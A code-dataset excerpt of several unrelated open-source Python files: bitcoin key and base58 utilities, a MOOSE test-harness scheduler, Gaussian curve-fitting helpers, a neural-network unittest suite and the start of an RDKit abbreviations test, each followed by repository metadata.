return '04' + public_key2.to_string().encode('hex')
def get_private_key_from_stretched_exponent(self, for_change, n, secexp):
order = generator_secp256k1.order()
secexp = ( secexp + self.get_sequence(for_change, n) ) % order
pk = number_to_string( secexp, generator_secp256k1.order() )
compressed = False
return SecretToASecret( pk, compressed )
def get_private_key(self, seed, sequence):
for_change, n = sequence
secexp = self.stretch_key(seed)
return self.get_private_key_from_stretched_exponent(for_change, n, secexp)
def check_seed(self, seed):
curve = SECP256k1
secexp = self.stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
if master_public_key != self.mpk:
print_error('invalid password (mpk)')
raise BaseException('Invalid password')
return True
def redeem_script(self, sequence):
return None
def b58encode(v):
""" encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(hashlib.sha256(public_key).digest())
return md.digest()
except:
import ripemd
md = ripemd.new(hashlib.sha256(public_key).digest())
return md.digest()
def hash_160_to_bc_address(h160, addrtype = 0):
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
mnemonic_hash = lambda x: hmac_sha_512("Bitcoin mnemonic", x).encode('hex')
hmac_sha_512 = lambda x,y: hmac.new(x, y, hashlib.sha512).digest()
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
|
ohadcn/vanityBrain
|
old_mnemonic.py
|
Python
|
gpl-3.0
| 23,497
|
[
"CRYSTAL",
"VisIt"
] |
ca9f2876a3f740d9506ea819c80d2f4c9bf7f317a9266c73906df9fbc6ddd569
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from TestHarness.schedulers.Scheduler import Scheduler
from TestHarness import util
class RunParallel(Scheduler):
"""
RunParallel is a Scheduler plugin responsible for executing a tester
command and doing something with its output.
"""
@staticmethod
def validParams():
params = Scheduler.validParams()
return params
def __init__(self, harness, params):
Scheduler.__init__(self, harness, params)
def run(self, job):
""" Run a tester command """
tester = job.getTester()
# Do not execute app, and do not processResults
if self.options.dry_run:
self.setSuccessfulMessage(tester)
return
# Launch and wait for the command to finish
job.run()
# Was this job already considered finished? (Timeout, Crash, etc)
if job.isFinished():
return
# Allow derived proccessResults to process the output and set a failing status (if it failed)
job_output = job.getOutput()
output = tester.processResults(tester.getMooseDir(), self.options, job_output)
# If the tester has not yet failed, append additional information to output
if not tester.isFail():
# Read the output either from the temporary file or redirected files
if tester.hasRedirectedOutput(self.options):
redirected_output = util.getOutputFromFiles(tester, self.options)
output += redirected_output
# If we asked for redirected output but none was found, we'll call that a failure
if redirected_output == '':
tester.setStatus(tester.fail, 'FILE TIMEOUT')
output += '\n' + "#"*80 + '\nTester failed, reason: ' + tester.getStatusMessage() + '\n'
else:
output += '\n' + "#"*80 + '\nTester failed, reason: ' + tester.getStatusMessage() + '\n'
# Set testers output with modifications made above so it prints the way we want it
job.setOutput(output)
# Test has not yet failed and we are finished... therfor it is a passing test
if not tester.isFail():
self.setSuccessfulMessage(tester)
def setSuccessfulMessage(self, tester):
""" properly set a finished successful message for tester """
message = ''
# Handle 'dry run' first, because if true, job.run() never took place
if self.options.dry_run:
message = 'DRY RUN'
elif tester.specs['check_input']:
message = 'SYNTAX PASS'
elif self.options.scaling and tester.specs['scale_refine']:
message = 'SCALED'
elif self.options.enable_recover and tester.specs.isValid('skip_checks') and tester.specs['skip_checks']:
message = 'PART1'
tester.setStatus(tester.success, message)
|
nuclear-wizard/moose
|
python/TestHarness/schedulers/RunParallel.py
|
Python
|
lgpl-2.1
| 3,186
|
[
"MOOSE"
] |
7571612ddccd774a69d9fbdd1a9e0ce7a1d5a9c47459ccfe912c61f42b2d0cf9
|
import numpy as np
import stsci.tools.nmpfit as mpfit
from numpy.polynomial.chebyshev import Chebyshev as CC
def gaussian4(p, x):
''' gaussian model
p[0] -- scale factor
p[1] -- centroid
p[2] -- sigma
p[3] -- offset
Area: (p[0]-p[3]) x p[2] x np.sqrt(2 x pi)
'''
u = (x - p[1])/p[2]
return p[0]*np.exp(-0.5*u*u) + p[3]
def gaussian5(p, x):
''' gaussian model
p[0] -- scale factor
p[1] -- centroid
p[2] -- sigma
p[3] -- offset
p[4] -- slope
Area: (p[0]-p[3]) x p[2] x np.sqrt(2 x pi)
'''
u = (x - p[1])/p[2]
return p[0]*np.exp(-0.5*u*u) + p[3] + p[4]*x
def sedm_wavelen(p, x):
''' SED Machine wavelength function
'''
A,B,C,D = p
return
return A + B*x + C*x**2 + D*x**3
return A*B**x + C*(x-D)**1
def mpfit_residuals(modelfun, preffun=None):
'''Returns a residual function for mpfit code'''
def fun(param, fjac=None, x=None, y=None, error=None):
'''Generic function'''
model = modelfun(param, x)
status = 0
if preffun is not None:
# There is a parameter prefernece
prefval = preffun(param)
else:
prefval = 1.0
if error is None:
return [status, (y-model) * prefval]
return [status, (y-model)/error*prefval]
return fun
def mpfit_do(residual_fun, # function returned from mpfit_residuals() above
x, # input x
y, # input y = f(x)
parinfo, # initial parameter guess
error=None,
quiet=1,
maxiter=20):
'''Returns mpfit fit sturcture for residual fun
Args:
residual_fun: residual_fun from mpfit_residuals
x, y: x and y data values
parinfo: Structure containing mpfit pars see
help(mpfit)
Example:
g4res = Fit.mpfit_residuals(Fit.gaussian4)
parguess = [{'value': 1600}, {'value': 0}, {'value': 2}, {'value': 200}]
fit = Fit.mpfit_do(g4res, xs, prof, parguess)'''
fa = {"x": x, "y": y}
if error is not None:
fa["error"] = error
lsf = mpfit.mpfit(residual_fun, parinfo=parinfo, functkw=fa,
quiet=quiet, maxiter=maxiter)
return lsf
|
nickkonidaris/kpy
|
NPK/Fit.py
|
Python
|
gpl-2.0
| 2,232
|
[
"Gaussian"
] |
cfcd6effb0f0b665af50a8d5b0811a5e059a8bb6866bfe1e54d448e5425c2706
|
import unittest
from Ann import Ann
import numpy as np
import random
import copy
import os
import pickle
class Test(unittest.TestCase):
def test_1(self):
# Test for Ann Architecture#
# First architecture test#
n_i1 = 4 # Number of input neurons
n_h1 = 2 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=4, n_h=2 , n_o=1) # Create this architecture
self.assertEqual(n_i1, ann1.n_i)
self.assertEqual(n_h1, ann1.n_h)
self.assertEqual(n_o1, ann1.n_o)
self.assertEqual(ann1.s, [5, 5, 5, 2])
self.assertEqual(len(ann1.Thetas), 3)
self.assertEqual(ann1.Thetas[0].shape, (4, 5))
self.assertEqual(ann1.Thetas[1].shape, (4, 5))
self.assertEqual(ann1.Thetas[2].shape, (1, 5))
# Second architecture test#
n_i2 = 10 # Number of input neurons
n_h2 = 1 # Number of hidden layers
n_o2 = 2 # Number of output neurons
ann2 = Ann(n_i=n_i2, n_h=n_h2, n_o=n_o2) # Create this architecture
self.assertEqual(n_i2, ann2.n_i)
self.assertEqual(n_h2, ann2.n_h)
self.assertEqual(n_o2, ann2.n_o)
self.assertEqual(ann2.s, [11, 11, 3])
self.assertEqual(len(ann2.Thetas), 2)
self.assertEqual(ann2.Thetas[0].shape, (10, 11))
self.assertEqual(ann2.Thetas[1].shape, (2, 11))
# Third architecture test#
n_i3 = 100 # Number of input neurons
n_h3 = 0 # Number of hidden layers
n_o3 = 10 # Number of output neurons
ann3 = Ann(n_i=n_i3, n_h=n_h3, n_o=n_o3) # Create this architecture
self.assertEqual(n_i3, ann3.n_i)
self.assertEqual(n_h3, ann3.n_h)
self.assertEqual(n_o3, ann3.n_o)
self.assertEqual(ann3.s, [101, 11])
self.assertEqual(len(ann3.Thetas), 1)
self.assertEqual(ann3.Thetas[0].shape, (10, 101))
n_i4 = 1500 # Number of input neurons
n_h4 = 3 # Number of hidden layers
n_o4 = 6 # Number of output neurons
# Fourth architecture test#
ann4 = Ann(n_i=n_i4, n_h=n_h4, n_o=n_o4) # Create this architecture
self.assertEqual(n_i4, ann4.n_i)
self.assertEqual(n_h4, ann4.n_h)
self.assertEqual(n_o4, ann4.n_o)
self.assertEqual(ann4.s, [1501, 31 + 1, 31 + 1, 31 + 1, 6 + 1])
self.assertEqual(len(ann4.Thetas), 4)
self.assertEqual(ann4.Thetas[0].shape, (31, 1501))
self.assertEqual(ann4.Thetas[1].shape, (31, 32))
self.assertEqual(ann4.Thetas[2].shape, (31, 32))
self.assertEqual(ann4.Thetas[3].shape, (6, 32))
# Fourth (arbitrary) architecture test#
s = [3, 2]
n_i = 4
n_h = len(s)
n_o = 2
ann1 = Ann(s=s, n_i=n_i, n_h=n_h, n_o=n_o) # Create this architecture
self.assertEqual(n_i, ann1.n_i)
self.assertEqual(n_h, ann1.n_h)
self.assertEqual(n_o, ann1.n_o)
self.assertEqual(ann1.s, [5, 3, 2, 3])
self.assertEqual(len(ann1.Thetas), 3)
self.assertEqual(ann1.Thetas[0].shape, (2, 5))
self.assertEqual(ann1.Thetas[1].shape, (1, 3))
self.assertEqual(ann1.Thetas[2].shape, (2, 2))
def test_2(self):
# Test for forward-propagation#
# First architecture test#
# Logistic regression (0 hidden layers) forward propagation test#
n_i1 = 4 # Number of input neurons
n_h1 = 0 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
x2 = [-1, -1, -1, -1] # Array as second example
# Set all weights to zero#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
self.assertEqual(shape, (1, 5))
ann1.Thetas[i] = np.zeros(shape)
self.assertEqual(ann1.h(x1), 0.5)
self.assertEqual(ann1.h(x2), 0.5)
# Set all weights to one#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
self.assertEqual(shape, (1, 5))
ann1.Thetas[i] = np.ones(shape)
self.assertAlmostEqual(ann1.h(x1), 0.999, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.0474, delta=0.0001)
# Set all weights randomly between -1 and 1 (and test the range of output)#
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
self.assertAlmostEqual(ann1.h(x1), 0.5, delta=0.5) # Sigmoid always gives values between 0 and 1
self.assertAlmostEqual(ann1.h(x2), 0.5, delta=0.5)
# Custom Thetas weights#
M = np.matrix([[1, -1, 0.5, -0.3, 2]])
ann1.Thetas[0] = M
self.assertAlmostEqual(ann1.h(x1), 0.786, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.858, delta=0.001)
# Second architecture test#
# 1 hidden layer forward propagation test#
n_i1 = 4 # Number of input neurons
n_h1 = 1 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
x2 = [-1, -1, -1, -1] # Array as second example
# Set all weights to zero#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
ann1.Thetas[i] = np.zeros(shape)
self.assertEqual(ann1.h(x1), 0.5)
self.assertEqual(ann1.h(x2), 0.5)
# Set all weights to one#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
ann1.Thetas[i] = np.ones(shape)
self.assertAlmostEqual(ann1.h(x1), 0.993, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.767, delta=0.001)
# Set all weights randomly between -1 and 1 (and test the range of output)#
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
self.assertAlmostEqual(ann1.h(x1), 0.5, delta=0.5) # Sigmoid always gives values between 0 and 1
self.assertAlmostEqual(ann1.h(x2), 0.5, delta=0.5)
# Custom Thetas weights#
M1 = np.matrix([[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2]])
M2 = np.matrix([[1, 1, -1, 0.5, -1]])
ann1.Thetas[0] = M1
ann1.Thetas[1] = M2
# a^(1) Should be [0.786 0.786 0.786 0.786 1]^T#
self.assertAlmostEqual(ann1.h(x1), 0.545, delta=0.001)
# a^(1) Should be [0.858 0.858 0.858 0.858 1]^T#
self.assertAlmostEqual(ann1.h(x2), 0.571, delta=0.001)
def test_3(self):
# Test the dimensions of the Jacobian matrices against Theta matrices for first architecture#
n_i1 = 4 # Number of input neurons
n_h1 = 2 # Number of hidden layers
n_o1 = 2 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
y1 = [1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
# Test the dimensions of the Jacobian matrices against Theta matrices for second architecture#
n_i1 = 40 # Number of input neurons
n_h1 = 3 # Number of hidden layers
n_o1 = 10 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = 10 * [1, 2, 3, 4] # Array as first example
y1 = [1, 0, 1, 1, 0, 0, 1, 0, 1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
# Test the dimensions of the Jacobian matrices against Theta matrices for third architecture#
n_i1 = 40 # Number of input neurons
n_h1 = 0 # Number of hidden layers
n_o1 = 10 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = 10 * [1, 2, 3, 4] # Array as first example
y1 = [1, 0, 1, 1, 0, 0, 1, 0, 1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
def test_4(self):
# Gradient checking (check that a numerical approximation of the gradient is equal to our backpropagation derivation)#
# First data-set with one example
arrs = []
labels = []
arrs.append([1, 2, 4, 5, 5, 5])
labels.append('cat')
ann = Ann(arrs, labels, n_h=10) # Create Ann with these train_examples and labels
J = ann.backward(ann.train_examples[0].arr, ann.train_examples[0].y)
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
for i in range(0, shape_J[0]):
for j in range(0, shape_J[1]):
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
# print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
# Second data-set with several train_examples
arrs = []
labels = []
classes = ('cat', 'dog')
for m in range(0, 100):
arr = [random.random() for x in range(0, 20)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch()
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
a = random.sample(range(0, shape_J[0]), 2)
b = random.sample(range(0, shape_J[1]), 2)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_5(self):
# Comprehensive gradient checking #
# Medium size data-set with more than two classes
arrs = []
labels = []
classes = ('cat', 'dog', 'bird', 'turtle', 'dinosaur', 'human')
for m in range(0, 100):
arr = [random.random() for x in range(0, 200)]
z = random.random()
if (z < 1 / 6):
label = classes[0]
elif (z >= 1 / 6 and z < 2 / 6):
label = classes[1]
elif (z >= 2 / 6 and z < 3 / 6):
label = classes[2]
elif (z >= 3 / 6 and z < 4 / 6):
label = classes[3]
elif (z >= 4 / 6 and z < 5 / 6):
label = classes[4]
else:
label = classes[5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch()
T_original = copy.deepcopy(ann.Thetas)
# Just check the neuron connections between first, second, and third layer
for l in range(0, 2):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
# Randomly select 100 neuron connections to check
a = random.sample(range(0, shape_J[0]), 10)
b = random.sample(range(0, shape_J[1]), 10)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_6(self):
# Test if training works by checking that training lowers the cost for random small and medium size data-sets#
# Small size random data-set with two labels
arrs = []
labels = []
classes = ('cat', 'dog')
for i in range(0, 2):
print('\nTesting data-set ' + str(i))
for m in range(0, 10):
arr = [random.random() for x in range(0, 3)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels) # Create Ann with these train_examples and labels
cost_before = ann.cost()
ann.train()
cost_after = ann.cost()
self.assertTrue(cost_after <= cost_before)
# Medium size random data-set with three labels
arrs = []
labels = []
classes = ('cat', 'dog', 'bird')
for i in range(0, 2):
print('\nTesting data-set ' + str(i))
for m in range(0, 50):
arr = [random.random() for x in range(0, 10)]
z = random.random()
if (z < 0.33):
label = classes[0]
elif (z >= 0.33 and z < 0.66):
label = classes[1]
else:
label = classes[2]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels) # Create Ann with these train_examples and labels
cost_before = ann.cost()
ann.train()
cost_after = ann.cost()
self.assertTrue(cost_after <= cost_before)
def test_7(self):
# Learn some basic functions#
# Linearly-separable data-sets#
# function 1 (AND function) on 0 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=0)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# function 2 on 2 hidden layers
arrs = []
arrs.append([1, 1])
arrs.append([2, 2])
arrs.append([1, 3])
arrs.append([2, 10])
arrs.append([1, -1])
arrs.append([-2, -2])
arrs.append([1, -3])
arrs.append([-2, -10])
labels = []
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=2)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# Non-linearly-separable data-sets#
'''
# function 1 (XOR function) on 1 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
ann = Ann(arrs, labels, n_h=1)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# function 1b (XOR function) on 1 hidden layers (with custom architecture)
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
s = [4, 5] # Custom hidden layer architecture
ann = Ann(arrs, labels, n_h=len(s), s=s)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
'''
# function 1 (two nested sets) on 2 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 1])
arrs.append([1, 1])
arrs.append([10, 0])
arrs.append([0, 10])
arrs.append([110, 10])
arrs.append([-10, 10])
labels = []
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=0)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
def test_8(self):
# First test#
# 1 hidden layer cost test with regularization#
x1 = [1, 2, 3, 4] # Array as first example
y1 = 'yes'
arrs = []
labels = []
arrs.append(x1)
labels.append(y1)
ann1 = Ann(arrs, labels, n_h=1) # Create this architecture
# Custom Thetas weights#
M1 = np.matrix([[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2]])
M2 = np.matrix([[1, 1, -1, 0.5, -1]])
ann1.Thetas[0] = M1
ann1.Thetas[1] = M2
cost_0 = ann1.cost() # lam equals 0
cost_1 = ann1.cost(lam=1) # lam equals 1
self.assertTrue(cost_1 > cost_0) # Cost with regularization penalty is always higher than without regularization
# Gradient checking (now with regularization)#
# Medium size data-set with several train_examples
lam_test = 1 # Regularization parameter
arrs = []
labels = []
classes = ('cat', 'dog')
for m in range(0, 100):
arr = [random.random() for x in range(0, 40)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch(lam=lam_test, batch=1) # Use full-batch for gradient descent
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
a = random.sample(range(0, shape_J[0]), 2)
b = random.sample(range(0, shape_J[1]), 2)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost(lam=lam_test) # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost(lam=lam_test) # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
# print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_9(self):
'''
# function 1 (XOR function) on 1 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
ann = Ann(arrs, labels, n_h=1)
# Train and save model
model = ann.train()[0][0] # Take the first model from the list of models in the tuple
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# Load the trained model into a new neural network
ann_from_model = Ann(model)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs[1]), 'true')
x = [1.1, 0.9]
self.assertEqual(ann_from_model.h_by_class(x), 'false')
'''
# function 2 on 2 hidden layers
arrs2 = []
arrs2.append([1, 1])
arrs2.append([2, 2])
arrs2.append([1, 3])
arrs2.append([2, 10])
arrs2.append([1, -1])
arrs2.append([-2, -2])
arrs2.append([1, -3])
arrs2.append([-2, -10])
labels2 = []
labels2.append('false')
labels2.append('false')
labels2.append('false')
labels2.append('false')
labels2.append('true')
labels2.append('true')
labels2.append('true')
labels2.append('true')
ann = Ann(arrs2, labels2, n_h=2)
model2 = ann.train()[0][0]
ann.validate_train()
# Load the second model
ann_from_model = Ann(model2)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs2[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs2[len(arrs2) - 1]), 'true')
x = [1, -5]
self.assertEqual(ann_from_model.h_by_class(x), 'true')
# Load the first model again
ann_from_model = Ann(model)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs[1]), 'true')
x = [1.1, 0.9]
self.assertEqual(ann_from_model.h_by_class(x), 'false')
# Try pickling our model into a sister folder
model_name = model.name
directory = '../Ann-models'
path_to_file = directory + '/' + model_name
if not os.path.exists(directory):
os.makedirs(directory)
pickle.dump(model, open(path_to_file, 'wb'))
# Try unpickling our model
unpickled_model = pickle.load(open(path_to_file, 'rb'))
# Load unpickled model and test
ann_from_pickle = Ann(unpickled_model)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_pickle.h_by_class(arrs[0]), 'false')
self.assertEqual(ann_from_pickle.h_by_class(arrs[1]), 'true')
x = [1.1, 0.9]
self.assertEqual(ann_from_pickle.h_by_class(x), 'false')
def test_10(self):
'''Creates a fake data-set with points labeled 'yes' around origin and points labeled 'no' outside'''
arrs = []
labels = []
'''Points about the origin (located in a box of length 16 centered at origin)'''
for i in range(0, 100):
arr = [random.randint(0, 8) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'yes'
arrs.append(arr)
labels.append(label)
'''Points outside the box'''
for i in range(0, 100):
arr = [random.randint(10, 20) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'no'
arrs.append(arr)
labels.append(label)
'''Add some noise'''
for i in range(0, 10):
arr = [random.randint(0, 8) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'no' # Note: this is artificially misclassified
arrs.append(arr)
labels.append(label)
for i in range(0, 10):
arr = [random.randint(10, 20) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'yes' # Note: this is artificially misclassified
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2)
(models, test_accuracies, test_costs) = ann.train()
best_test_accuracy = 0
best_i = -1
for i in range(0, len(test_accuracies)):
if (test_accuracies[i] > best_test_accuracy):
best_test_accuracy = test_accuracies[i]
best_i = i
if (best_i > -1):
model_name = models[i].name
directory = '../Ann-models'
path_to_file = directory + '/' + model_name
if not os.path.exists(directory):
os.makedirs(directory)
pickle.dump(models[i], open(path_to_file, 'wb'))
else:
print('Error!')
if __name__ == "__main__":
unittest.main()
|
kod3r/Ann
|
Ann-py/Ann_test.py
|
Python
|
mit
| 27,969
|
[
"NEURON"
] |
7c2d8a297a3e92417528862efa8fe23d2ee45a937b8a3c92e35987fb2c7a104f
|
#
# Copyright (C) 2020 Greg Landrum and T5 Informatics GmbH
# @@ All Rights Reserved @@
#
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
from rdkit import Chem
from rdkit.Chem import rdAbbreviations
import unittest
class TestCase(unittest.TestCase):
def setUp(self):
self.defaultAbbrevs = rdAbbreviations.GetDefaultAbbreviations()
self.defaultLinkers = rdAbbreviations.GetDefaultLinkers()
self.customLinkers = rdAbbreviations.ParseLinkers('''PEG3 *OCCOCCOCC* PEG3
Pent *CCCCC*
Cy *C1CCC(*)CC1 Cy''')
def testParsingAbbrevs(self):
defn = '''CO2Et C(=O)OCC
COOEt C(=O)OCC
